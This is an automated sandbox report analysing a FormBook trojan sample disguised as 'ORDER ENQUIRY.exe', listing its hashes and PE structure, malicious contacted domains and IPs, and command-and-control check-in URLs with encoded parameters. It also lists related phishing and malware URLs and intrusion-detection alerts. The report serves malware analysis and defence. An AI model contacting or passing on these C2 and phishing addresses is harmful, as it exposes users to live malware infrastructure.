http://www.cheaplaptops.bizReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.yc23w.top	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cheaplaptops.biz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.manhuafeifei.xyz/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.mksport-app.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000004.00000002.4556219779.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.bodgion.xyz/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.manhuafeifei.xyzReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://flywatchsecurity.com/hy08?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL	explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmp	false		unknown
http://crl.v	explorer.exe, 00000004.00000000.2099752489.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4550702238.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.os9user.com/hy08/www.mksport-app.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
199.59.243.227	www.os9user.com	United States	395082	BODIS-NJUS	true
154.221.68.229	www.mksport-app.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
3.33.130.190	raidsa.xyz	United States	8987	AMAZONEXPANSIONGB	true
154.197.185.220	www.horxncnt.xyz	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true
151.101.0.119	flywatchsecurity.com	United States	54113	FASTLYUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523220
Start date and time:	2024-10-01 10:04:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	ORDER ENQUIRY.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@11/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 127 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:05:04	API Interceptor	1x Sleep call for process: ORDER ENQUIRY.exe modified
04:05:12	API Interceptor	7645146x Sleep call for process: explorer.exe modified
04:05:48	API Interceptor	7187700x Sleep call for process: colorcpl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.59.243.227	https://conbassecomlogii.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	cbcoinbasepremiunm.great-site.net/_tr
	https://kuconlogin-ui.godaddysites.com/	Get hash	malicious	Unknown	Browse	ww25.fladestateins.com/_tr
	SecuriteInfo.com.suspected.of.Trojan.Downloader.gen.13209.11014.exe	Get hash	malicious	Unknown	Browse	www.rjwn.com/btvuYqzds.js
	nBjauMrrmC.exe	Get hash	malicious	FormBook	Browse	www.runccl.com/btrd/?XBZp7=lTrl&tTuD=C3V55vncN7yVAjAcRBQureN2DAJdCLOy0KVWQyL7L2n53NJTQKRDeKbykJZyPZM1JLvC
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.care-for-baby-1107.xyz/cxj4/
	z61SwiftCopyOfPayment.exe	Get hash	malicious	FormBook	Browse	www.knee-pain-treatment-140741.xyz/jd21/?pPA800q0=yDnXSEuFFI5Fa7EZVwfMYj+SV8a9unqzRGp9lcINeNkO/Fjw4nnZoS+sdxtHpipwBukZUQVhVg==&SZ=dnxdCh7P22ilbRg
	QlHhDu2uh1.exe	Get hash	malicious	FormBook	Browse	www.donante-de-ovulos.biz/ej48/
	PO23100072.exe	Get hash	malicious	FormBook	Browse	www.donante-de-ovulos.biz/8lrv/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.care-for-baby-1107.xyz/cxj4/
	PO-000001488.exe	Get hash	malicious	FormBook	Browse	www.donante-de-ovulos.biz/8lrv/
23.227.38.74	ORDER_1105-19-24-3537.pdf.exe	Get hash	malicious	FormBook	Browse	www.day2go.net/rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA
	Specification and Quantity Pdf.exe	Get hash	malicious	FormBook	Browse	www.tuktukwines.com/n7ak/
	r8ykXfy52F9CXd5d.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?EhCdVX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YsxR0Bd308&Ir=X2JLBxZp
	0nazQxrt5MZ5BRK.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?RlXX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP480K2QI5QWVnx/JXOA==&DvU8k=hbjlAVS0fTh
	ojtBIU0jhM.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.faredeal.online/v15n/?qN9=EFNxULM0Cf1t&jL0=ukmuyFp122ER9SkUd0Oy5jDnVATzXW6kTvhnBjXlJsYO+LS6EgGMB9Jvm3Bl806Q2DBF
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?5jE=K85VkNWCgTAjHltp4ubjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YJqgEBd3ox&ZN9Ls=9rCTo2P0wPzDj0p
	LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exe	Get hash	malicious	FormBook	Browse	www.vanguardcoffee.shop/rn94/?D8v=8pGtVJo0up&Rfg=24QTUhZRstyZshAJnYZI2UxfXBs/uV+QALIDsDsnR/VZc8/4uu3qctyboRQgkU7gUCap
	Etisalat Summary Bill for the Month of August.exe	Get hash	malicious	FormBook	Browse	www.melliccine.com/pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2
	MAPAL AMENDED PI SO23000680.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/hsmv/
	Payment Advice - Ref[GLV407423235].scr.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/hsmv/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.horxncnt.xyz	S04307164.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	154.204.95.140
www.os9user.com	PURCHASING ORDER.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	199.59.243.226
shops.myshopify.com	https://ebookkeepers.com.pk/	Get hash	malicious	Unknown	Browse	23.227.38.74
	http://fix-bill.com/	Get hash	malicious	Unknown	Browse	23.227.38.74
	H9DsG7WKGt.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://cancelar-plan-pr0teccion1.w3spaces.com/	Get hash	malicious	Unknown	Browse	23.227.38.74
	ORDER_1105-19-24-3537.pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Specification and Quantity Pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	r8ykXfy52F9CXd5d.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	t5ueYgHiHnIdeNe.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	http://chiao1129.github.io/login	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74
	http://vineethkinik.github.io/Netflix-wesite-frontend	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DXTL-HKDXTLTseungKwanOServiceHK	http://wap.theblmediagroup.com/	Get hash	malicious	Unknown	Browse	122.10.20.83
	http://v884.cc/	Get hash	malicious	Unknown	Browse	45.194.135.236
	https://walletprotocol.vercel.app/	Get hash	malicious	Unknown	Browse	156.225.111.30
	SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elf	Get hash	malicious	Mirai	Browse	154.85.232.125
	qxLluDZMxN.exe	Get hash	malicious	Unknown	Browse	156.227.0.161
	QvTbUiFWlo.elf	Get hash	malicious	Mirai	Browse	45.194.232.116
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	154.85.183.50
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	154.85.183.50
	uB31aJH4M0.exe	Get hash	malicious	Simda Stealer	Browse	154.85.183.50
	SecuriteInfo.com.Linux.Siggen.9999.8352.26322.elf	Get hash	malicious	Mirai	Browse	156.235.217.93
AMAZONEXPANSIONGB	http://www.aieov.com/setup.exe	Get hash	malicious	Unknown	Browse	3.33.243.145
	https://www.afghanhayatrestaurant.com.au/	Get hash	malicious	Unknown	Browse	3.33.243.145
	https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3D	Get hash	malicious	HTMLPhisher	Browse	3.33.220.150
	https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdf	Get hash	malicious	HTMLPhisher	Browse	3.33.220.150
	https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=	Get hash	malicious	Unknown	Browse	3.33.220.150
	https://www.allegiantair.com/deals//smsgiveaway	Get hash	malicious	Unknown	Browse	52.223.40.198
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	update SOA.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	https://serrespec.weebly.com/tc2000-stock-charting-software.html	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	3.33.220.150
BODIS-NJUS	https://tracking.groovesell.com:443/t/1c336171327d66d10a047ef8cbabb880	Get hash	malicious	Unknown	Browse	199.59.243.227
	https://pokerfanboy.com/	Get hash	malicious	Unknown	Browse	199.59.243.227
	https://mx1.margarettaphilomena.net/	Get hash	malicious	Unknown	Browse	199.59.243.205
	https://conbassecomlogii.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	199.59.243.227
	https://kuconlogin-ui.godaddysites.com/	Get hash	malicious	Unknown	Browse	199.59.243.227
	SecuriteInfo.com.suspected.of.Trojan.Downloader.gen.13209.11014.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	nBjauMrrmC.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	https://41619ec8e8407cbea965833e1fb35e027cd895bdef33c8d4bb7a06d460.pages.dev/	Get hash	malicious	Unknown	Browse	199.59.243.227
	https://b47324b31aa4ee0c39345febbbd635556bd7b07a0995b64436378baed7.pages.dev/	Get hash	malicious	Unknown	Browse	199.59.243.227
	http://f41aff2909cfd057585b1f61d87df66d8a0613f5ce2d194125c00f2c2f.pages.dev/	Get hash	malicious	Unknown	Browse	199.59.243.227
CLOUDFLARENETUS	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Shipping Documents.xls	Get hash	malicious	Remcos	Browse	172.67.216.244
	po110-11#U3000Sip_KAHRAMANKAZAN AS %100% S51105P-E01 #Uff08fiyati teklifi#Uff09IMG .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://u47214858.ct.sendgrid.net/ls/click?upn=u001.c4dv-2BqJoebtefwT8NPLgxJhEAMFjIETH3I3Q8CNmlUyiUmttbZn0qPd3YBU1FvM-2FTPZQ0Ny-2FjdR-2FE-2F7zRj1y6P-2FWlxAyLuXYXbYHvhJ5g8KGiVmaicte80xV-2Bl3IZC9tXXFR_qqk8pzmFTqXgUqmijN8NLgkwBDr0C-2Barb6A8p6EP2vzfFIYXQXZPUsC69-2F89CrBr6pqEhlk-2Bm2kXZ9T2yO-2F2wXq53tvBzsea7EyzJ8-2FeaRjYTKe8296LUx3dR165pmE81l4ZlyCckh6XAStB7X6mpZG1eDt2Z2hE9lreTf4zUu15BHkFWIQD6l06j98sSmxefpIhKrPbp1sHqorvnsLfTlqgy97iDW5x7jEFHBjvW3kB67l3ddnWvdhOAQtXJjvxkBTHzOZ1xmNB-2F-2BJv2yxw-2BZ118sFXhzW7kT0jCD4nVA53ptg-2FlDPfE3xlZZV9CMctrTJ1N8IAj5d062XIpZOe3B3qxw6lRc-2FlE4u0JOetbEvf0rjlMWcXfPEqpotI-2F2oVP9HyepyGLoftfNEm6SwBOFPsaNp7O-2BtHor7tHsI-2B0toVkv4rP0i-2Br0nrtV4hMR-2FdhpHoJiQMDnEQt4HkwhputltaAXkVwiAgeKUBKMe5BZPlwbFaY695vWxuBA8sXYlfIlA2nH2OTZtq4olwBYb-2B2OH7O0v7kh9lZbdG-2FR7aHKFdYLoQNSTKRWoXOCWruqXPTLLwScg4q6t45M9fA06bOcDeidFPVNDK-2FWFzDkHMQLFcxNpkS3T2MKWPAPYmVVSF-2FYvR-2FCjme44RBe4WqMVRDyINtH-2BCgXVuhmhyhlxqnQJQ3khWyNBODdBzIgWx7SJHQER1-2BQIENitwqgFbxnEHVgdtauGxq3b7b9C-2BkO-2BOeMHOIaRwA-2BSx45dj5rG-2BfMrbH9xwp2AcUmYUCFe15mQPKLSUbdkG53z-2BRi6KQYCNPyauzai9f2rlpGdEnSU7g8yhbiAHqaWchhGFREcCHEMvyZXxkCNwEjj7wKionbQnEVTNY1chMS4frV68nYnZpRS4eFq1F-2BziFy5Fu7I-2BEGiv2g-3D-3D	Get hash	malicious	Unknown	Browse	188.114.97.3
	63670000.xls	Get hash	malicious	Unknown	Browse	104.21.78.54
	63670000.xls	Get hash	malicious	Unknown	Browse	172.67.216.244
	Scan Order and Specification 01-10- 2024.docx	Get hash	malicious	Remcos	Browse	172.67.216.244
	https://app.getresponse.com/change_details.html?x=a62b&m=BrgFNl&s=BW9rcZD&u=C3YQM&z=EMkQID6&pt=change_details	Get hash	malicious	Unknown	Browse	104.16.160.168
	http://www.aieov.com/setup.exe	Get hash	malicious	Unknown	Browse	172.67.41.60
	https://docs.zoom.us/doc/qMqlDrh-RUWwdmI-mAClTg	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41

Process:	C:\Users\user\Desktop\ORDER ENQUIRY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.706229588765733
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	ORDER ENQUIRY.exe
File size:	695'808 bytes
MD5:	754fa726ba767c17ebbce69e967d40ca
SHA1:	b011ef478a435e685c3180d10c1c25bbc58ce105
SHA256:	79bcad797129c0be508de0fe7b0462b1aaffbafa74a4e7019a4561deb674f4bd
SHA512:	ad6b237579b0d4f9993e0894a6923882243df1d3b7722fb9496962dfd6c5b7a7828e7ff4d6b4c8adba621e58ffdd6dc33bb3dc9650ec461fa457a50785217177
SSDEEP:	12288:dE3YCt5VADTdLpS8UMYw3Etz44KBvC3eimLMXm:dwYCmLpS9k3E944Ko3eiUF
TLSH:	1EE4E0E03F3A7319DE685A30D639EDF552A51D687040BAE319DD3B8779AD211AE0CF02
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T.f..............0..\|... ........... ........@.. ....................................@................................

File Icon


Icon Hash:	0f6dedc9c9cc6d0f

Static PE Info

General

Entrypoint:	0x4a9a2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FB54B0 [Tue Oct 1 01:47:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa99dc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaa000	0x1d88	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xac000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa8674	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa7a34	0xa7c00	3b7993e3d72f0717fbf70e90344553a3	False	0.8597053721125186	data	7.71035451108767	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xaa000	0x1d88	0x1e00	a530d502432feb2a23f8b6e058a367dc	False	0.8955729166666667	data	7.419320783478042	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xac000	0xc	0x200	e155361f528c5c938bfc3de759032b95	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xaa0c8	0x1a49	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9655223658790311
RT_GROUP_ICON	0xabb24	0x14	data	1.05
RT_VERSION	0xabb48	0x23c	data	0.4755244755244755

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T10:05:00.616006+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49724	151.101.0.119	80	TCP
2024-10-01T10:05:00.616006+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49724	151.101.0.119	80	TCP
2024-10-01T10:05:00.616006+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49724	151.101.0.119	80	TCP
